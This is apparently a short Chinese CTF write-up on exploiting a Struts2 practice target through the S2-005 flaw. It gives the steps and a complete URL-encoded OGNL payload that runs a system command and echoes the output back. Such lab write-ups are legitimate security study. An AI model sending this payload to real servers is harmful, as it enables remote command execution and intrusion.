随笔

• 2021-11-11 11:25
  可以通过访问如下路径判断是否为Struts2框架
  /struts/webconsole.html
• 2021-11-11 21:34
  Struts2利用方式存在两种，一种有回显信息，一种无回显信息，此处仅记录有回显信息的利用方式
  
  

目标靶场

解题步骤

• 又是熟悉的 .action 后缀
  
• 先通过响应信息查看中间件信息
  
• 还是老老实实跟着题目提示走，尝试寻找Struts2 S2-005的利用方式
• 访问首页，然后使用burp suite抓包
  
• 修改请求方式，将其改为POST请求方式
  
• 将POC插入到请求正文即可
  redirect:${%23req%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletReq%27%2b%27uest%27),%23s%3dnew%20java.util.Scanner((new%20java.lang.ProcessBuilder(%27pwd%27.toString().split(%27\\s%27))).start().getInputStream()).useDelimiter(%27\\AAAA%27),%23str%3d%23s.hasNext()?%23s.next():%27%27,%23resp%3d%23context.get(%27co%27%2b%27m.open%27%2b%27symphony.xwo%27%2b%27rk2.disp%27%2b%27atcher.HttpSer%27%2b%27vletRes%27%2b%27ponse%27),%23resp.setCharacterEncoding(%27UTF-8%27),%23resp.getWriter().println(%23str),%23resp.getWriter().flush(),%23resp.getWriter().close()}=
  
• 漏洞成功执行，通过更改命令寻找目标Key提交即可